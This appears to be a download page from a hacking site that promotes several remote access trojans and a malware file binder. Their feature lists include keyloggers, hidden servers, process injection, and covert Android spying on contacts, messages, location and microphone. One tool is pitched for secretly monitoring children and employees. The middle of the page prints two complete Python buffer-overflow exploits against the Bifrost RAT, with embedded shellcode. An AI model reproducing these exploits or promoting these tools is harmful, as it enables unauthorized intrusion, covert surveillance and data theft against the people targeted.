[Jspy RAT v0.08] Java Multiplatform Remote Administration Tool

jSpy is a RAT developed in Java. Need to monitor your childrens internet use? Check that your workers are doing what you paid them for? Help a friend out with a problem on his computer? No worries, whether it be Windows or Mac OSX that you need to manage, or manage from - jSpy is the answer.

Stable

jSpy uses a library called Kryonet developed by Esoterics Software. By using this library for networking, jSpy creates an environment where you can be rest assured you won't lose your clients.

Powerful

jSpy has an abundance of features, and is actively developed by a 17 year old java programmer from London. If you have any suggestions please email me at: javastealth@gmail.com

Multiple OS Support

jSpy will run on Windows, Mac OSX and Linux. jSpy was developed on a Mac ensuring that all features work on both UNIX and DOS Systems.

Download Jspy RAT v0.08 

[Sub7 v0.5] Remote Administration Tool

This is the Newest Sub7 Remote Administration Tool..The Official Releases can only be found @ www.sub-7.org

Submitted by Diabl0

Download Sub7

Password Mirror:www.sub-7.org

Mirror Sub7

[Adzok] Administrador Remoto hecho en Java

Adzok Free esta basado en Adzok Open, es la edición que continuará el desarrollo de Adzok Open. Adzok Free será de codigo cerrado pero gratís.

Caracteristicas del Cliente

- Remote Desktop.

- Remote Shell.

- Upload and Download Files.

- Keylogger Online.

- Send Messages.

- Load and Run Script.

- Information System.

- Send Keys.

- Clipboard.

- Fun (Restart, Shutdown, Visit WebSite, Execute Command Shell, etc).

- Escucha en 3 puertos.

- El envio de información y la tranferencia de datos se realiza solo por 1 puerto.

- No necesita instalación pero es necesario que la maquina tenga instalado Java.

- Sistema de conexión inversa.

- Carpeta de descarga por cada usuario.

- Independiente al Sistema Operativo en teoria puede funcionar en cualquier Sistema   Operativo que tenga instalado Java.

- Generador del server.

- Desinstalador del server.

Caracteristicas del Servidor

Optimizado para: Windows XP, Windows Vista, Windows 7.

• Keylogger solo esta disponible en todas las versiones de Windows (32 y 64 bits).

- Unico server para todos los sistemas operativos.

- No necesita instalación pero es necesario que la maquina tenga instalado Java.

- Mutex (Evita que se ejecute 2 veces el servidor), pero continuará mostrando la imagen de su empresa manteniendose invisible el server para el usuario.

- Tamaño del server: 54 KB (Sin comprimir).

Download Adzok

[Rakabulle] Advance File Binder from DarkComet RAT Developer

File binder is an application that allows a user to bind multiple files together, resulting in a single executable file. When you execute that single application, all previous merged files will be extracted to a temporary location, and will be executed normally.

"The builder Rakabulle application will create a stub and inject in its resource the target files to extract and execute. The stub is the little generate part of the program which is designed to extract from its resource the target files to a temporary location and execute. In our application the stub also got a part to inject in Explorer or Internet Explorer process and load custom made plugins.

Listed features are:

• File binder, auto file extractor and executor.
• REM (Remote Code Execution), Execute code (Plugins) in target process (Explorer or Internet Explorer)
• Support 32 and 64 Process.
• The application is a 32bit Application (Soon we will compile the 64bit version)
• Support UPX compression for the stub (Without compression stub size is about 38KiB using pure Windows API no extra libraries; with compression stub size is approximately 16KiB) The UPX compression doesn’t change the way the application work only the final size.
• Support Windows startup.
• Doesn’t require administrative privileges.
• Plugins and File list support drag and drop.
• Support plugins with an open source example.
• The stub and the builder are coded using Unicode encoding.

Download Rakabulle

Bozok RAT 1.5

After ~2 months I am proud to announce that Bozok reached version 1.5. In this version i tried to fix all reported bugs and implement audiocapture which many people asked for.

Changelog:

-added russian

-added korean

-fixed webcam device list bug

-fixed DEP problem on webcam/screen

-handshake bug fixed

-plugin loading bug fixed

-installation to system32 tweakened

-audiocapture added

Download Bozok 1.5

[Splinter] RAT open source

Splinter The Rat es una RAT (Remote Administration Tool). Este tipo de herramientas normalmente nos permite tomar el control de un bot (sistema comprometido).

Splinter The Rat actúa como BotMaster o controlador de la botnet y está diseñado para trabajar con distintos tipos de backdoors o puertas traseras: netcat listeners o implantes creados en Java o Python, ya precompilados en el sistema. En el futuro también se integrará con Armitage y Raven.

Además este RAT también permite la transferencia y navegación de ficheros, geolocalización, acceso y/o modificación del portapapeles de la víctima, capturas de pantalla y grabación, etc.

Splinter The RAT es un proyecto educativo del que podemos aprender como crear herramientas de este tipo y que además son totalmente funcionales. El objetivo de éste según sus autores es el de mostrar lo fácil que es crear una herramienta de este tipo.

Este proyecto está activamente siendo desarrollado y algunas de las características que podemos esperar en futuras versiones son:

• Desarrollos de implantes en Python, PowerShell y C++.
• Estaganogfía, TCP/DNS tunneling.
• Drive-by-downloaders y droppers Javascript
• Creación de implantes polimórficos y cifrado de la comunicación de los payloads
• Escaneo de redes internas
• Explotación de dispositivos móviles
• Etc

Si alguna vez has pensado crear la infraestructura detrás de una botnet, aquí tienes un buen ejemplo para crear la tuya propia o construirla sobre ésta.

Fuente

Descarga Splinter

[Exploit] Bifrost 1.2.1 and 1.2d - Remote Buffer OverFlow

Bifrost 1.2.1 - Remote Buffer OverFlow

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys
 
def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
     
    return ''.join(out)
 
def bif_len(s):
    while len(s)<8:
         s=s+"00"
    return s
 
def header(s):
      a=(s[0]+s[1]).decode("hex")
      a+=(s[2]+s[3]).decode("hex")
      a+=(s[4]+s[5]).decode("hex")
      a+=(s[5]+s[6]).decode("hex")
      return a
 
def random():    
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a
 
def usage():
 
   print "\n\n\t***************************"
   print "\t*    By : Mohamed Clay    *"
   print "\t*  Bifrost 1.2.1 Exploit  *"
   print "\t***************************\n"
   print "\t  Usage : ./bifrost1.2.1 host port"
   print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
 
 
if len(sys.argv)!=3:
    usage()
    exit()
 
HOST=sys.argv[1]
PORT=int(sys.argv[2])
 
key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
 
xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
 
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
 
#calc.exe shellcode (badchars "\x00")
 
buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"
 
 
raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30
 
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"

Bifrost 1.2d - Remote Buffer Overflow

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import threading
import sys
 
def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
     
    return ''.join(out)
 
def bif_len(s):
    while len(s)<8:
         s=s+"00"
    return s
 
def header(s):
      a=(s[0]+s[1]).decode("hex")
      a+=(s[2]+s[3]).decode("hex")
      a+=(s[4]+s[5]).decode("hex")
      a+=(s[5]+s[6]).decode("hex")
      return a
 
def random():    
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a
 
 
def exploit():
    s.sendall(out)
 
def usage():
 
   print "\n\n\t***************************"
   print "\t*    By : Mohamed Clay    *"
   print "\t*  Bifrost 1.2d Exploit  *"
   print "\t***************************\n"
   print "\t  Usage : ./bifrost1.2.1 host port"
   print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
 
 
if len(sys.argv)!=3:
    usage()
    exit()
 
HOST=sys.argv[1]
PORT=int(sys.argv[2])
 
key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
 
xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
 
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
 
#calc.exe shellcode (badchars "\x00")
 
buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"
 
 
raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30
 
 
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
 
 
data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:\|C:\|C:\|MA|00000000|BifrosT v1.2d|"
out2=rc4crypt(data2,key)
l=header(bif_len(str(hex(len(data2))).split("0x")[1]))
out2=l+out2
 
th = threading.Thread(name='exploit', target=exploit)
th.setDaemon(True)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out2)
th.start()
s.recv(1024)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"

Download Bifrost 1.2d - Remote Buffer Overflow

Download Bifrost 1.2.1 - Remote Buffer OverFlow

Bozok RAT 1.4.3

Changelog:
-fixed socket timeout bug
-fixed small translation bugs
-added spanish/arabic/bulgarian/polish/french translation
-added "Test Connection" in builder

Download Bozok RAT 1.4.3 

[AndroRat] Remote Administration Tool for Android

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

The name Androrat is a mix of Android and RAT (Remote Access Tool).

It has been developed in a team of 4 for a university project. It has been realised in one month. The goal of the application is to give the control of the android system remotely and retrieve informations from it.

Technical matters

• The android application is the client for the server which receive all the connections.
• The android application run as a service(not an activity) that is started during the boot. So the user does not need to interact with the service (Even though there is a debug activity that allow to configure the IP and the port to connect to).
• The connection to the server can be triggered by a SMS or a call (this can be configured)

All the available functionalities are

• Get contacts (and all theirs informations)
• Get call logs
• Get all messages
• Location by GPS/Network
• Monitoring received messages in live
• Monitoring phone state in live (call received, call sent, call missed..)
• Take a picture from the camera
• Stream sound from microphone (or other sources..)
• Streaming video (for activity based client only)
• Do a toast
• Send a text message
• Give call
• Open an URL in the default browser
• Do vibrate the phone

Folders

The project contains the following folders:

• doc: Will soonly contain all the documentation about the project
• Experiment: Contain an experimental version of the client articulated around an activity wish allow by the way to stream video
• src/Androrat: Contain the source code of the client that should be put on the android plateform
• src/AndroratServer: Contain the sources of the Java/Swing server that can be run on any plateform
• src/api: Contain all the different api used in the project (JMapViewer for the map, forms for swing, and vlcj for video streaming)
• src/InOut: Contain the code of the content common for the client and the server which is basically the protocol implementation

Download AndroRat